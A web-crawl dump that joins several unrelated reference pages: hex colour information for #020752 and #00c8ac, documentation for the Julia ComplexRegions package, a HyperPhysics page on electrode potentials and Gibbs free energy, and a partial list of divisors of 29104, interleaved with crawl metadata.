`rgb(4,13,157)``\nMonochromatic Color\n\n# Alternatives to #020752\n\nBelow, you can see some colors close to #020752. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #021b52\n``#021b52` `rgb(2,27,82)``\n• #021452\n``#021452` `rgb(2,20,82)``\n• #020e52\n``#020e52` `rgb(2,14,82)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #040252\n``#040252` `rgb(4,2,82)``\n• #0a0252\n``#0a0252` `rgb(10,2,82)``\n• #110252\n``#110252` `rgb(17,2,82)``\nSimilar Colors\n\n# #020752 Preview\n\nThis text has a font color of #020752.\n\n``<span style=\"color:#020752;\">Text here</span>``\n#020752 background color\n\nThis paragraph has a background color of #020752.\n\n``<p style=\"background-color:#020752;\">Content here</p>``\n#020752 border color\n\nThis element has a border color of #020752.\n\n``<div style=\"border:1px solid #020752;\">Content here</div>``\nCSS codes\n``.text {color:#020752;}``\n``.background {background-color:#020752;}``\n``.border {border:1px solid #020752;}``\n\n# Shades and Tints of #020752\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #000005 is the darkest color, while #f1f2ff is the lightest one.\n\n• #000005\n``#000005` `rgb(0,0,5)``\n• #010219\n``#010219` `rgb(1,2,25)``\n• #01042c\n``#01042c` `rgb(1,4,44)``\n• #02053f\n``#02053f` `rgb(2,5,63)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #020965\n``#020965` `rgb(2,9,101)``\n• #030a78\n``#030a78` `rgb(3,10,120)``\n• #030c8b\n``#030c8b` `rgb(3,12,139)``\n• #040e9f\n``#040e9f` `rgb(4,14,159)``\n• #040fb2\n``#040fb2` `rgb(4,15,178)``\n• #0511c5\n``#0511c5` `rgb(5,17,197)``\n• #0512d8\n``#0512d8` `rgb(5,18,216)``\n• #0614eb\n``#0614eb` `rgb(6,20,235)``\n• #0b1af9\n``#0b1af9` `rgb(11,26,249)``\n• #1f2cfa\n``#1f2cfa` `rgb(31,44,250)``\n• #323efa\n``#323efa` `rgb(50,62,250)``\n• #4550fa\n``#4550fa` `rgb(69,80,250)``\n• #5862fb\n``#5862fb` `rgb(88,98,251)``\n• #6b74fb\n``#6b74fb` `rgb(107,116,251)``\n• #7e86fc\n``#7e86fc` `rgb(126,134,252)``\n• #9298fc\n``#9298fc` `rgb(146,152,252)``\n• #a5aafd\n``#a5aafd` `rgb(165,170,253)``\n• #b8bcfd\n``#b8bcfd` `rgb(184,188,253)``\n• #cbcefe\n``#cbcefe` `rgb(203,206,254)``\n• #dee0fe\n``#dee0fe` `rgb(222,224,254)``\n• #f1f2ff\n``#f1f2ff` `rgb(241,242,255)``\nTint Color Variation\n\n# Tones of #020752\n\nA tone is produced by adding gray to any pure hue. In this case, #29292b is the less saturated color, while #020752 is the most saturated one.\n\n• #29292b\n``#29292b` `rgb(41,41,43)``\n• #26262e\n``#26262e` `rgb(38,38,46)``\n• #222332\n``#222332` `rgb(34,35,50)``\n• #1f2035\n``#1f2035` `rgb(31,32,53)``\n• #1c1e38\n``#1c1e38` `rgb(28,30,56)``\n• #191b3b\n``#191b3b` `rgb(25,27,59)``\n• #15183f\n``#15183f` `rgb(21,24,63)``\n• #121542\n``#121542` `rgb(18,21,66)``\n• #0f1245\n``#0f1245` `rgb(15,18,69)``\n• #0c0f48\n``#0c0f48` `rgb(12,15,72)``\n• #080d4c\n``#080d4c` `rgb(8,13,76)``\n• #050a4f\n``#050a4f` `rgb(5,10,79)``\n• #020752\n``#020752` `rgb(2,7,82)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #020752 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.53391784,"math_prob":0.7047469,"size":3630,"snap":"2019-51-2020-05","text_gpt3_token_len":1596,"char_repetition_ratio":0.13237728,"word_repetition_ratio":0.011090573,"special_character_ratio":0.57052344,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9940744,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-13T08:26:46Z\",\"WARC-Record-ID\":\"<urn:uuid:4bbe7084-f203-4d72-b0f3-1a98a422ef7f>\",\"Content-Length\":\"36134\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15f48f01-15dd-4dd6-8282-23f547d172e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb312ae9-2b94-4037-9713-0b2061c91209>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/020752\",\"WARC-Payload-Digest\":\"sha1:AXQS4XFIFVYMAM4ZK54SASPACEPBA3PY\",\"WARC-Block-Digest\":\"sha1:7T7SBDD4KX5VDCH7ORGCXJWRZU7C55KQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540551267.14_warc_CC-MAIN-20191213071155-20191213095155-00208.warc.gz\"}"} |
https://complexvariables.github.io/ComplexRegions.jl/stable/ | [
"Introduction\n\n# ComplexRegions\n\nThis package provides types and methods that are useful for working with curves and regions in the (extended) complex plane.\n\nMost functionality is provided through Julia types (roughly equivalent to classes in an object-oriented language). Per Julia conventions, these are all capitalized. You use these capitalized names to create values of the type; e.g., Segment and Circle.\n\nOther functions (methods, in Julia terms) may create values of these types, but since they are not distinct types themselves, they are not capitalized. For example, the `rectangle` method creates a Polygon.\n\nThe methods in this package should work not only with the built-in `Complex` type, but also with the `Polar` and `Spherical` types from the `ComplexValues` package, which it re-exports.\n\n## Abstract types\n\nAll `abstract` types have names starting with `Abstract`. You probably won't encounter them unless you want to extend the provided functionality.\n\nAn abstract type cannot itself be instantiated as a value. They serve as supertypes that collect common-denominator functionality, much like an interface in other languages. For example, any `AbstractCurve` is supposed to provide functions for finding points, tangents, and normals along the curve. Specific subtypes such as a Ray or Arc provide additional specialized functionalities appropriate to the subtypes.\n\n## Curve, Path, and Region\n\nA curve is meant to be a smooth, non-self-intersecting curve in the extended complex plane. There is a generic Curve type that requires you to specify an explicit parameterization that is not checked for smoothness or even continuity. Implementations are given for more specific types of curve.\n\nA path is a piecewise-continuous complex-valued path. In practice a Path can be specified as an array of curves. The path is checked for continuity at creation time. The most important provided specific path types are Polygon and CircularPolygon.\n\nBoth curves and paths have closed variants. These are additionally checked that the initial and final points are the same.\n\nOne atypical aspect of curves and paths, even \"closed\" ones, is that they lie in the extended or compactified complex plane and thus may be unbounded. For instance, a line in the plane may be interpreted as a circle on the Riemann sphere, and is thus a \"closed\" curve passing through infinity.\n\nA region is an open region in the extended plane bounded by a closed curve or path.\n\nSome examples:\n\n``````julia> ℓ = Line(1/2,1/2+1im) # line through 0.5 and 0.5+1i\nLine{Complex{Float64}} in the complex plane:\nthrough (0.5 + 0.0im) parallel to (0.0 + 1.0im)\n\njulia> c = 1 / ℓ # a circle\nCircle{Complex{Float64}} in the complex plane:\ncentered at (1.0 + 0.0im) with radius 1.0, negatively oriented\n\njulia> intersect(ℓ,c)\n2-element Array{Complex{Float64},1}:\n0.5 + 0.8660254037844386im\n0.5 - 0.8660254037844386im\n\njulia> plot(ℓ); plot!(c)\nPlot{Plots.GRBackend() n=2}``````",
null,
"``````julia> plot(Spherical(ℓ)); plot!(Spherical(c))\nPlot{Plots.GRBackend() n=40}``````",
null,
"``````julia> reflect(-1,c) # reflection of a point through the circle\n0.5 + 0.0im\n\njulia> plot(interior(ℓ)) # plot a half-plane\nPlot{Plots.GRBackend() n=1}``````",
null,
"``````julia> h = n_gon(7)\nPolygon with 7 vertices:\n1.0 + 0.0im, interior angle 0.7142857142857143⋅π\n0.6234898018587336 + 0.7818314824680298im, interior angle 0.7142857142857143⋅π\n-0.22252093395631434 + 0.9749279121818236im, interior angle 0.7142857142857143⋅π\n-0.900968867902419 + 0.43388373911755823im, interior angle 0.7142857142857143⋅π\n-0.9009688679024191 - 0.433883739117558im, interior angle 0.7142857142857143⋅π\n-0.2225209339563146 - 0.9749279121818236im, interior angle 0.7142857142857143⋅π\n0.6234898018587334 - 0.7818314824680299im, interior angle 0.7142857142857143⋅π\n\njulia> plot(h);\n\njulia> for k in 1:7\nz = exp(k*2im*π/20)\nplot!(z*h - 0.5k - 0.1im*k^2)\nend``````",
null,
"``````julia> p = Polygon([0,-1im,(0,0),1im,(pi,pi)]) # channel with a step\nPolygon with 5 vertices:\n0.0 + 0.0im, interior angle 1.5⋅π\n0.0 - 1.0im, interior angle 0.5⋅π\nInf + 0.0im, interior angle 0.0⋅π\n0.0 + 1.0im, interior angle 1.0⋅π\nInf + 0.0im, interior angle 0.0⋅π\n\njulia> plot(interior(p))\nPlot{Plots.GRBackend() n=1}``````",
null,
"## Tolerance\n\nBoundaries and endpoints are not well-posed ideas in floating-point, since an arbitrarily small perturbation to a value can move a point on or off of them. Thus many concepts in the package such as intersection or continuity are checked only up to a small tolerance. This value can be set on a per-call basis, or by using global defaults.\n\n## Global defaults\n\nFor work at the REPL, it's convenient to be able to set an influential parameter just once rather than in multiple calls. This mechanism is provided via `ComplexRegions.default`. You can see all the default parameters and values as follows:\n\n``````julia> ComplexRegions.default()\nDict{Symbol,Float64} with 1 entry:\n:tol => 1.0e-12``````\n\nChanging them is done with the same function:\n\n``````julia> ComplexRegions.default(tol=1e-8)\n[ Info: Default value of `tol` set to 1.0e-8.``````\n\nBe advised that this type of \"stateful\" computing brings some subtle undesirable consequences. For example, if the global default `tol` is changed in a future release of the package, existing code could give different results when testing for interior points. If maximum reproducibility is a concern, you should develop the habit of setting all defaults yourself at the beginning of your code."
] | [
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/line_circle.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/line_circle_sphere.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/halfplane.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/heptagons.svg",
null,
"https://complexvariables.github.io/ComplexRegions.jl/stable/channel.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8133333,"math_prob":0.8757364,"size":5299,"snap":"2020-45-2020-50","text_gpt3_token_len":1500,"char_repetition_ratio":0.12464589,"word_repetition_ratio":0.0051746443,"special_character_ratio":0.30439705,"punctuation_ratio":0.15589353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96103024,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-29T17:14:39Z\",\"WARC-Record-ID\":\"<urn:uuid:dc905fcd-37f9-418c-80d3-9209eb8a37e8>\",\"Content-Length\":\"10768\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:79c083ea-9445-4705-a765-88f70aaa5ff2>\",\"WARC-Concurrent-To\":\"<urn:uuid:54b10600-e975-4c9f-98e1-04b574f7b574>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://complexvariables.github.io/ComplexRegions.jl/stable/\",\"WARC-Payload-Digest\":\"sha1:K72OMQ522BUH4GDDA3CECLTAOTNTBP34\",\"WARC-Block-Digest\":\"sha1:D4RTMHFWTXQUZTIQKN7DDKHXKUG6GIXM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107904834.82_warc_CC-MAIN-20201029154446-20201029184446-00113.warc.gz\"}"} |
http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/electrode2.html | [
"# Strengths of Oxidizing and Reducing Agents\n\nThe strengths of oxidizing and reducing agents are indicated by their standard electrode potentials. A sample from the table of standard potentials shows the extremes of the table.\n\n Cathode (Reduction)Half-Reaction Standard PotentialE° (volts) Li+(aq) + e- → Li(s) -3.04 K+(aq) + e- → K(s) -2.92 Ca2+(aq) + 2e- → Ca(s) -2.76 Na+(aq) + e- → Na(s) -2.71 Zn2+(aq) + 2e- → Zn(s) -0.76 Cu2+(aq) + 2e-→ Cu(s) 0.34 O3(g) + 2H+(aq) + 2e- → O2(g) + H2O(l) 2.07 F2(g) + 2e-→ 2F-(aq) 2.87\n\nThe values for the table entries are reduction potentials, so lithium at the top of the list has the most negative number, indicating that it is the strongest reducing agent. The strongest oxidizing agent is fluorine with the largest positive number for standard electrode potential.\n\n Table of Standard Electrode Potentials\nIndex\n\nOxidation/\nReduction concepts\n\nElectrochemistry concepts\n\nReference\nHill & Kolb\nCh 8\n\nEbbing\nCh 19\n\n HyperPhysics***** Electricity and Magnetism ***** Chemistry R Nave\nGo Back\n\n# Free Energy and Electrode Potentials\n\nThe cell potential of a voltaic cell is a measure of the maximum amount of energy per unit charge which is available to do work when charge is transferred through an external circuit. This maximum work is equal to the change in Gibbs free energy, ΔG, in the reaction. These relationships can be expressed as\n\nMaximum work = ΔG = -nFE°cell\n\nwhere n is the number of electrons transferred per mole and F is the Faraday constant.\n\nConsider the historic Daniell cell in which zinc and copper were used as electrodes. The data from the table of standard electrode potentials is\n\n Cathode (Reduction)Half-Reaction Standard PotentialE° (volts) Zn2+(aq) + 2e- → Zn(s) -0.76 Cu2+(aq) + 2e- → Cu(s) 0.34\n\nThe standard cell potential is then E°cell = 1.1 volt and 2 electrons are transferred per mole of reactant. The change in free energy is then\n\nΔG = -nFE°cell = -2 x 96,485 coul/mole x 1.10 joule/coul = -212 kJ\n\nThis relationship with free energy can be used in the opposite direction as well. From a table of thermodynamic quantities, the free energy changes for the ions under standard conditions are\n\nZn2+(aq), ΔG = -147.21 kJ/mol\n\nCu2+(aq), ΔG = 64.98 kJ/mol\n\nSince the Zn ion is produced and the Cu ion is reduced in the cell process, the net change in free energy is -212 kJ/mol, as we obtained above. Starting from these free energy changes, we could have calculated the cell potential of 1.1 volts by reversing the above calculation.\n\n Table of Standard Electrode Potentials\nIndex\n\nOxidation/\nReduction concepts\n\nElectrochemistry concepts\n\nReference\nHill & Kolb\nCh 8\n\nEbbing\nCh 19\n\n HyperPhysics***** Electricity and Magnetism ***** Chemistry R Nave\nGo Back\n\n# Electrode Potentials and Equilibrium Constants\n\nThe cell potential of a voltaic cell is a measure of the maximum amount of energy per unit charge which is available to do work when charge is transferred through an external circuit. This maximum work is equal to the change in Gibbs free energy, ΔG, in the reaction. These relationships can be expressed as\n\nMaximum work = ΔG = -nFE°cell\n\nwhere n is the number of electrons transferred per mole and F is the Faraday constant.\n\nThis free energy change can also be related to the equilibrium constant K\n\nΔG = -RT ln K\n\nCombining these relationships allows us to express the cell potential in terms of the equilibrium constant.",
null,
"Consider the historic Daniell cell in which zinc and copper were used as electrodes. The data from the table of standard electrode potentials is\n\n Cathode (Reduction)Half-Reaction Standard PotentialE° (volts) Zn2+(aq) + 2e- → Zn(s) -0.76 Cu2+(aq) + 2e- → Cu(s) 0.34\n\nThe standard cell potential is then E°cell = 1.1 volt and 2 electrons are transferred per mole of reactant. The relationship for the equilibrium constant is then",
null,
"This extremely high value for the equilibrium constant confirms that the reaction of the Daniell cell is indeed spontaneous and that it will proceed until the reactants are exhausted.\n\n Table of Standard Electrode Potentials\nIndex\n\nOxidation/\nReduction concepts\n\nElectrochemistry concepts\n\nReference\nHill & Kolb\nCh 8\n\nEbbing\nCh 19\n\n HyperPhysics***** Electricity and Magnetism ***** Chemistry R Nave\nGo Back"
] | [
null,
"http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/imgche/emfequ.png",
null,
"http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/imgche/emfequ2.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8781465,"math_prob":0.97895616,"size":3290,"snap":"2020-34-2020-40","text_gpt3_token_len":743,"char_repetition_ratio":0.12659769,"word_repetition_ratio":0.5009074,"special_character_ratio":0.2024316,"punctuation_ratio":0.061643835,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99418133,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T06:24:08Z\",\"WARC-Record-ID\":\"<urn:uuid:df20cdc5-dcdd-4436-94d6-cc0dbcbc97c8>\",\"Content-Length\":\"9755\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:954c3800-bc3a-453c-b2f8-81bad965613c>\",\"WARC-Concurrent-To\":\"<urn:uuid:58207984-8d45-4ad8-b6f2-8d827776bf89>\",\"WARC-IP-Address\":\"131.96.55.77\",\"WARC-Target-URI\":\"http://230nsc1.phy-astr.gsu.edu/hbase/Chemical/electrode2.html\",\"WARC-Payload-Digest\":\"sha1:WSKHQW6RARRD7WJAX57VSOEWNJRPAR4S\",\"WARC-Block-Digest\":\"sha1:WE3OHMWNHGODA35IMJN66PW5S2HFFGB5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401585213.82_warc_CC-MAIN-20200928041630-20200928071630-00448.warc.gz\"}"} |
https://www.colorhexa.com/00c8ac | [
"# #00c8ac Color Information\n\nIn a RGB color space, hex #00c8ac is composed of 0% red, 78.4% green and 67.5% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 0% magenta, 14% yellow and 21.6% black. It has a hue angle of 171.6 degrees, a saturation of 100% and a lightness of 39.2%. #00c8ac color hex could be obtained by blending #00ffff with #009159. Closest websafe color is: #00cc99.\n\n• R 0\n• G 78\n• B 67\nRGB color chart\n• C 100\n• M 0\n• Y 14\n• K 22\nCMYK color chart\n\n#00c8ac color description : Strong cyan.\n\n# #00c8ac Color Conversion\n\nThe hexadecimal color #00c8ac has RGB values of R:0, G:200, B:172 and CMYK values of C:1, M:0, Y:0.14, K:0.22. Its decimal value is 51372.\n\nHex triplet RGB Decimal 00c8ac `#00c8ac` 0, 200, 172 `rgb(0,200,172)` 0, 78.4, 67.5 `rgb(0%,78.4%,67.5%)` 100, 0, 14, 22 171.6°, 100, 39.2 `hsl(171.6,100%,39.2%)` 171.6°, 100, 78.4 00cc99 `#00cc99`\nCIE-LAB 72.418, -48.032, 2.272 28.098, 44.284, 46.094 0.237, 0.374, 44.284 72.418, 48.085, 177.292 72.418, -58.87, 10.809 66.546, -41.088, 5.514 00000000, 11001000, 10101100\n\n# Color Schemes with #00c8ac\n\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #c8001c\n``#c8001c` `rgb(200,0,28)``\nComplementary Color\n• #00c848\n``#00c848` `rgb(0,200,72)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #0080c8\n``#0080c8` `rgb(0,128,200)``\nAnalogous Color\n• #c84800\n``#c84800` `rgb(200,72,0)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #c80080\n``#c80080` `rgb(200,0,128)``\nSplit Complementary Color\n• #c8ac00\n``#c8ac00` `rgb(200,172,0)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #ac00c8\n``#ac00c8` `rgb(172,0,200)``\n• #1cc800\n``#1cc800` `rgb(28,200,0)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #ac00c8\n``#ac00c8` `rgb(172,0,200)``\n• #c8001c\n``#c8001c` `rgb(200,0,28)``\n• #007c6a\n``#007c6a` `rgb(0,124,106)``\n• #009580\n``#009580` `rgb(0,149,128)``\n• #00af96\n``#00af96` `rgb(0,175,150)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #00e2c2\n``#00e2c2` `rgb(0,226,194)``\n• #00fbd8\n``#00fbd8` `rgb(0,251,216)``\n• #16ffde\n``#16ffde` `rgb(22,255,222)``\nMonochromatic Color\n\n# Alternatives to #00c8ac\n\nBelow, you can see some colors close to #00c8ac. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #00c87a\n``#00c87a` `rgb(0,200,122)``\n• #00c88b\n``#00c88b` `rgb(0,200,139)``\n• #00c89b\n``#00c89b` `rgb(0,200,155)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #00c8bd\n``#00c8bd` `rgb(0,200,189)``\n• #00c3c8\n``#00c3c8` `rgb(0,195,200)``\n• #00b2c8\n``#00b2c8` `rgb(0,178,200)``\nSimilar Colors\n\n# #00c8ac Preview\n\nThis text has a font color of #00c8ac.\n\n``<span style=\"color:#00c8ac;\">Text here</span>``\n#00c8ac background color\n\nThis paragraph has a background color of #00c8ac.\n\n``<p style=\"background-color:#00c8ac;\">Content here</p>``\n#00c8ac border color\n\nThis element has a border color of #00c8ac.\n\n``<div style=\"border:1px solid #00c8ac;\">Content here</div>``\nCSS codes\n``.text {color:#00c8ac;}``\n``.background {background-color:#00c8ac;}``\n``.border {border:1px solid #00c8ac;}``\n\n# Shades and Tints of #00c8ac\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #000403 is the darkest color, while #effffd is the lightest one.\n\n• #000403\n``#000403` `rgb(0,4,3)``\n• #001714\n``#001714` `rgb(0,23,20)``\n• #002b25\n``#002b25` `rgb(0,43,37)``\n• #003f36\n``#003f36` `rgb(0,63,54)``\n• #005247\n``#005247` `rgb(0,82,71)``\n• #006658\n``#006658` `rgb(0,102,88)``\n• #007a69\n``#007a69` `rgb(0,122,105)``\n• #008d79\n``#008d79` `rgb(0,141,121)``\n• #00a18a\n``#00a18a` `rgb(0,161,138)``\n• #00b49b\n``#00b49b` `rgb(0,180,155)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\n• #00dcbd\n``#00dcbd` `rgb(0,220,189)``\n• #00efce\n``#00efce` `rgb(0,239,206)``\n• #04ffdc\n``#04ffdc` `rgb(4,255,220)``\n• #17ffdf\n``#17ffdf` `rgb(23,255,223)``\n• #2bffe1\n``#2bffe1` `rgb(43,255,225)``\n• #3fffe4\n``#3fffe4` `rgb(63,255,228)``\n• #52ffe7\n``#52ffe7` `rgb(82,255,231)``\n• #66ffea\n``#66ffea` `rgb(102,255,234)``\n• #7affec\n``#7affec` `rgb(122,255,236)``\n• #8dffef\n``#8dffef` `rgb(141,255,239)``\n• #a1fff2\n``#a1fff2` `rgb(161,255,242)``\n• #b4fff5\n``#b4fff5` `rgb(180,255,245)``\n• #c8fff7\n``#c8fff7` `rgb(200,255,247)``\n• #dcfffa\n``#dcfffa` `rgb(220,255,250)``\n• #effffd\n``#effffd` `rgb(239,255,253)``\nTint Color Variation\n\n# Tones of #00c8ac\n\nA tone is produced by adding gray to any pure hue. In this case, #5c6c6a is the less saturated color, while #00c8ac is the most saturated one.\n\n• #5c6c6a\n``#5c6c6a` `rgb(92,108,106)``\n• #55736f\n``#55736f` `rgb(85,115,111)``\n• #4d7b75\n``#4d7b75` `rgb(77,123,117)``\n• #45837a\n``#45837a` `rgb(69,131,122)``\n• #3e8a80\n``#3e8a80` `rgb(62,138,128)``\n• #369285\n``#369285` `rgb(54,146,133)``\n• #2e9a8b\n``#2e9a8b` `rgb(46,154,139)``\n• #26a290\n``#26a290` `rgb(38,162,144)``\n• #1fa996\n``#1fa996` `rgb(31,169,150)``\n• #17b19b\n``#17b19b` `rgb(23,177,155)``\n• #0fb9a1\n``#0fb9a1` `rgb(15,185,161)``\n• #08c0a6\n``#08c0a6` `rgb(8,192,166)``\n• #00c8ac\n``#00c8ac` `rgb(0,200,172)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #00c8ac is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.512665,"math_prob":0.8118361,"size":3676,"snap":"2021-43-2021-49","text_gpt3_token_len":1631,"char_repetition_ratio":0.13562092,"word_repetition_ratio":0.011111111,"special_character_ratio":0.53862894,"punctuation_ratio":0.23216309,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9792466,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-28T18:50:34Z\",\"WARC-Record-ID\":\"<urn:uuid:e79b32b7-4993-4c63-8136-8e8a17e093bc>\",\"Content-Length\":\"36134\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0f12e167-9adf-4101-bb5c-95714afceda3>\",\"WARC-Concurrent-To\":\"<urn:uuid:aa7012b4-2418-4bd6-86cd-65f4ace88e28>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/00c8ac\",\"WARC-Payload-Digest\":\"sha1:SY4WZWYEISLLCSNISYH3JCBHRFHAOVWI\",\"WARC-Block-Digest\":\"sha1:ZFO3ALZBHBVOQUYB7AJ5X2ARNCTRBTWU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588398.42_warc_CC-MAIN-20211028162638-20211028192638-00561.warc.gz\"}"} |
https://calculomates.com/en/divisors/of/29104 | [
"# Divisors of 29104\n\n## Divisors of 29104\n\nThe list of all positive divisors (that is, the list of all integers that divide 22) is as follows :\n\nAccordingly:\n\n29104 is multiplo of 1\n\n29104 is multiplo of 2\n\n29104 is multiplo of 4\n\n29104 is multiplo of 8\n\n29104 is multiplo of 16\n\n29104 is multiplo of 17\n\n29104 is multiplo of 34\n\n29104 is multiplo of 68\n\n29104 is multiplo of 107\n\n29104 is multiplo of 136\n\n29104 is multiplo of 214\n\n29104 is multiplo of 272\n\n29104 is multiplo of 428\n\n29104 is multiplo of 856\n\n29104 is multiplo of 1712\n\n29104 is multiplo of 1819\n\n29104 is multiplo of 3638\n\n29104 is multiplo of 7276\n\n29104 is multiplo of 14552\n\n29104 has 19 positive divisors\n\n## Parity of 29104\n\nIn addition we can say of the number 29104 that it is even\n\n29104 is an even number, as it is divisible by 2 : 29104/2 = 14552\n\n## The factors for 29104\n\nThe factors for 29104 are all the numbers between -29104 and 29104 , which divide 29104 without leaving any remainder. Since 29104 divided by -29104 is an integer, -29104 is a factor of 29104 .\n\nSince 29104 divided by -29104 is a whole number, -29104 is a factor of 29104\n\nSince 29104 divided by -14552 is a whole number, -14552 is a factor of 29104\n\nSince 29104 divided by -7276 is a whole number, -7276 is a factor of 29104\n\nSince 29104 divided by -3638 is a whole number, -3638 is a factor of 29104\n\nSince 29104 divided by -1819 is a whole number, -1819 is a factor of 29104\n\nSince 29104 divided by -1712 is a whole number, -1712 is a factor of 29104\n\nSince 29104 divided by -856 is a whole number, -856 is a factor of 29104\n\nSince 29104 divided by -428 is a whole number, -428 is a factor of 29104\n\nSince 29104 divided by -272 is a whole number, -272 is a factor of 29104\n\nSince 29104 divided by -214 is a whole number, -214 is a factor of 29104\n\nSince 29104 divided by -136 is a whole number, -136 is a factor of 29104\n\nSince 29104 divided by -107 is a whole number, -107 is a factor of 29104\n\nSince 29104 divided by -68 is a whole number, -68 is a factor of 29104\n\nSince 29104 divided by -34 is a whole number, -34 is a factor of 29104\n\nSince 29104 divided by -17 is a whole number, -17 is a factor of 29104\n\nSince 29104 divided by -16 is a whole number, -16 is a factor of 29104\n\nSince 29104 divided by -8 is a whole number, -8 is a factor of 29104\n\nSince 29104 divided by -4 is a whole number, -4 is a factor of 29104\n\nSince 29104 divided by -2 is a whole number, -2 is a factor of 29104\n\nSince 29104 divided by -1 is a whole number, -1 is a factor of 29104\n\nSince 29104 divided by 1 is a whole number, 1 is a factor of 29104\n\nSince 29104 divided by 2 is a whole number, 2 is a factor of 29104\n\nSince 29104 divided by 4 is a whole number, 4 is a factor of 29104\n\nSince 29104 divided by 8 is a whole number, 8 is a factor of 29104\n\nSince 29104 divided by 16 is a whole number, 16 is a factor of 29104\n\nSince 29104 divided by 17 is a whole number, 17 is a factor of 29104\n\nSince 29104 divided by 34 is a whole number, 34 is a factor of 29104\n\nSince 29104 divided by 68 is a whole number, 68 is a factor of 29104\n\nSince 29104 divided by 107 is a whole number, 107 is a factor of 29104\n\nSince 29104 divided by 136 is a whole number, 136 is a factor of 29104\n\nSince 29104 divided by 214 is a whole number, 214 is a factor of 29104\n\nSince 29104 divided by 272 is a whole number, 272 is a factor of 29104\n\nSince 29104 divided by 428 is a whole number, 428 is a factor of 
